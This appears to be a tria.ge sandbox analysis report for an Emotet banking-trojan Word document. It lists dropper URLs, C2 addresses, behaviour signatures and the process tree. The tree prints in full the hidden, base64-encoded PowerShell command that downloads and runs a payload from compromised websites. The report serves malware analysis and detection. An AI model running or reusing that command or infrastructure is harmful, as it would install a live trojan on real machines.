Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    18/12/2019, 09:29

Sharing

Copy URL
Twitter E-mail

General

  • Target

    bedd65fafaa2669674465e8001225734903a0f8e2cebb2abb023dca6e1820a26

  • Sample

    191218-3y5wzkd666

  • SHA256

    bedd65fafaa2669674465e8001225734903a0f8e2cebb2abb023dca6e1820a26

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://oneofakindcm.com/wp-content/q5b4qvb/
exe.dropper

https://bar-ola.com/wp-admin/KIdh35kENT/
exe.dropper

http://rinani.com/wp-includes/FFkV/
exe.dropper

https://stephporn.com/wp-admin/jzBARJvm/
exe.dropper

https://wowmotions.com/wp-admin/A8LwzwQ/

Extracted

Family

emotet

C2

173.247.19.238:80

174.81.132.128:80

211.44.35.111:80

165.227.156.155:443

167.99.105.223:7080

67.225.179.64:8080

176.31.200.130:8080

104.131.11.150:8080

68.118.26.116:80

190.226.44.20:21

120.150.246.241:80

92.222.216.44:8080

73.214.99.25:80

110.142.38.16:80

24.93.212.32:80

190.53.135.159:21

66.209.97.122:8080

173.91.11.142:80

100.14.117.137:80

2.237.76.249:80
rsa_pubkey.plain

Signatures

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bedd65fafaa2669674465e8001225734903a0f8e2cebb2abb023dca6e1820a26.doc" /o ""
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4844
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABXAGIAbgBlAGoAZwB5AG4AdQBuAD0AJwBQAHUAcQBtAG0AbQBrAGoAJwA7ACQAQgB5AHoAZABrAHcAaABzACAAPQAgACcAMgA5ADEAJwA7ACQASgB1AGUAegBlAHEAcQB1AHgAbQBtAHUAbwA9ACcAQQBlAGIAYQBrAGcAYwB4AGoAJwA7ACQAWQBxAHAAbwBtAGsAbABhAG8AZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQgB5AHoAZABrAHcAaABzACsAJwAuAGUAeABlACcAOwAkAFkAawB2AGkAcABlAGEAYwBkAGsAZQA9ACcAWABlAHMAYwByAGQAYQBiAGwAZQBsAGYAJwA7ACQATABqAGwAdwBlAG4AaQBoAHkAdAA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAYgBjAGwASQBlAE4AdAA7ACQATgBnAGcAcABpAHEAcQBvAG8AbABmAGEAegA9ACcAaAB0AHQAcABzADoALwAvAG8AbgBlAG8AZgBhAGsAaQBuAGQAYwBtAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcQA1AGIANABxAHYAYgAvACoAaAB0AHQAcABzADoALwAvAGIAYQByAC0AbwBsAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEsASQBkAGgAMwA1AGsARQBOAFQALwAqAGgAdAB0AHAAOgAvAC8AcgBpAG4AYQBuAGkALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEYARgBrAFYALwAqAGgAdAB0AHAAcwA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AagB6AEIAQQBSAEoAdgBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdwBvAHcAbQBvAHQAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AQQA4AEwAdwB6AHcAUQAvACcALgAiAFMAYABQAGwASQBUACIAKAAnACoAJwApADsAJABMAHIAaAB3AHYAdQByAHMAZwA9ACcAVwBpAHQAbAB3AHkAdgB4AGgAZABnACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAHYAYgBzAG0AdgBkAHoAaQBiAG4AYwAgAGkAbgAgACQATgBnAGcAcABpAHEAcQBvAG8AbABmAGEAegApAHsAdAByAHkAewAkAEwAagBsAHcAZQBuAGkAaAB5AHQALgAiAGQAYABvAGAAdwBOAEwAbwBhAEQARgBJAGwAZQAiACgAJABLAHYAYgBzAG0AdgBkAHoAaQBiAG4AYwAsACAAJABZAHEAcABvAG0AawBsAGEAbwBmACkAOwAkAEYAZgBlAGwAbgBmAGoAYwBoAHgAbwBrAHcAPQAnAE0AZABlAHgAdABtAHUAdgBnAHAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABZAHEAcABvAG0AawBsAGEAbwBmACkALgAiAGwAZQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMwAxADUAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgB0ACIAKAAkAFkAcQBwAG8AbQBrAGwAYQBvAGYAKQA7ACQASQB6AGQAZgBlAGgAcgBwAHAAZgBlAD0AJwBOAG8AawBmAGEAYQBsAG4AawBlAHkAJwA7AGIAcgBlAGEAawA7ACQATgBsAGsAeAB3AHkAYQB0AHUAaQB0AGoAPQAnAFcAcwB3AHgAYQB4AGMAeQBmAGsAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABVAGMAeAB2AGYAdwBrAHUAZwBmAHIAPQAnAEEAeAB0AGcAcgB3AHUAbABwACcA
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Users\Admin\291.exe
      "C:\Users\Admin\291.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Users\Admin\291.exe
        --d037f6c8
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:4588

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4588-12-0x0000000002060000-0x0000000002077000-memory.dmp

    Filesize

    92KB

    Download

  • memory/4588-13-0x0000000000400000-0x0000000000461000-memory.dmp

    Filesize

    388KB

    Download

  • memory/4628-10-0x0000000002250000-0x0000000002267000-memory.dmp

    Filesize

    92KB

    Download